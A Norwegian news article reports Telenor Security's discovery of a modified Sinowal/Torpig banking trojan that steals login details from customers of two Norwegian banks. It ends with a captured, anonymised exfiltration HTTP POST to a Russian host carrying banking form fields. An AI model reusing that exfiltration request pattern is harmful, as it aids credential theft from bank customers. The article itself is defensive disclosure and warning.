Spion kan tømme norske bank-kontoer

Et avansert spionprogram har smittet kunder til to norske banker og sender nå passord til tre russiske nettadresser.

Det er ikke virus som er den største sikkerhetstrusselen, det er avanserte trojaner-programmer som sniker seg inn på maskinen og snapper opp passord.

Hittil har ikke phising-forsøk og slike trojanere vært så farlige, fordi de ikke er sydd for å kunne angripe norske banker, som har digitale sertifikater eller passord som fort utløper.

Men nå avslører Telenor hvordan et slikt spionprogram rammer kunder fra to norske banker. Dette klarer Telenor Sikkerhet fordi man overvåker utgående trafikk på vegne av selskapets bedriftskunder.

Trojaneren ligger i bakgrunnen og lytter etter når brukeren skriver spesifikke nettadresser. Det er trolig en versjon av trojaneren "Sinowal/Torpig/GP" som er modifisert til å våkne når adressen til to norske banker tastes inn: Sparebanken 1 og DnB Nor.

Vekket til live, kopierer trojaneren alle passord og brukernavn som brukes i krypterte https://-sesjoner før de blir kryptert og sendt over til nettbanken for autentisering. Trojaneren sender informasjonen til tre russiske nettadresser.

Problemet for hackerne, som ønsker å tømme kontoene, er at passordene generert av norske bankers pin-kalkulatorer går ut i løpet av minutter. Men hackere klarer kanskje å tappe ut penger fra norske bankkonto likevel.

- Noen slike trojanere kan bryte forbindelsen og flytte over eller opprette en forbindelse selv i sanntid. Man er da inne og kan overføre penger fra kontoen, endre passord og få oversendt digitale sertifikater, forteller Frank Stien, leder for Telenor Sikkerhet, til digi.no.

- Vi har på en dag sett trafikk fra 200 brukere som er smittet. Telenor har datanett over hele verden, og alle disse bor ikke i Norge. Men det er klart at det finnes mange norske bedrifts-PCer som er smittet med dette programmet. I tillegg kommer et ukjent antall privatbrukere - Telenor plukker ikke opp denne type trafikk fra sine privatkunder.

Og programmet blir enda verre, forteller Stien

- Slike trojanere klarer å lamme de mest kjente antivirus-løsningene, og de skjuler at de gjør det - det ser ut som sikkerhetspakken fungerer, forteller han.

I hvilken grad norske kunder har fått tømt kontoen sin, vet ikke Telenor, de ser ikke denne type trafikk.

Hvordan trojaneren spres, kan ikke Telenor si noe om med utgangspunkt i den informasjonen de har, men de ser på trafikken at trojaneren er i stand til å motta oppdaterte instruksjoner, og at den klarer å sette det lokale antivirus-programmet ut av spill.

- Dette er en godt skrevet trojaner. Hvis den kombineres med en god distribusjonsmetode, kan den bli veldig farlig, sier Frank Stien i Telenor til digi.no.

Advarsel om trojaneren har Telenor sendt ut internt, til de berørte kundene og til de aktuelle nettbankene. Nå advarer Telenor også andre kunder.

Her er en av meldingene trojaneren hos en Telenor-kunde sendte

(Telenor har anonymisert nettadressen, passord og kontonummer):

POST

/gamma/x25.php?id=&sv=&build=testtraf2&ts=&ip=xxx.xxx.xxx.xxx:xxx.xxx.xxx.xx

x&sport=xxxx&hport=xxxxx&os=5.1.2600&cn=Norway HTTP/1.1

Content-Type: multipart/form-data; boundary=swefasvqdvwxff

Host: us22.ru

Content-Length: 485

Cache-Control: no-cache

User-Agent: Mozilla/4.0

Connection: Keep-Alive

X-BlueCoat-Via: E642D76FDAAAEEBC

--swefasvqdvwxff

Content-Disposition: form-data; name=datafile; filename="data.str"

Content-Type: application/octet-stream

IP XXX.XXX.XXX.XXX:XXX.XXX.XXX.XXX

[testtraf2]

Application: c:\programfiler\internet explorer\iexplore.exe

REQUEST:

HEADERS:

POST /NORSK BANK/login HTTP/1.1

Host:

Referer:

POST_FORM:

passwd=

account=

list=due

handler=payCommitBasket

abortHandler=pay

--swefasvqdvwxff--

Til toppen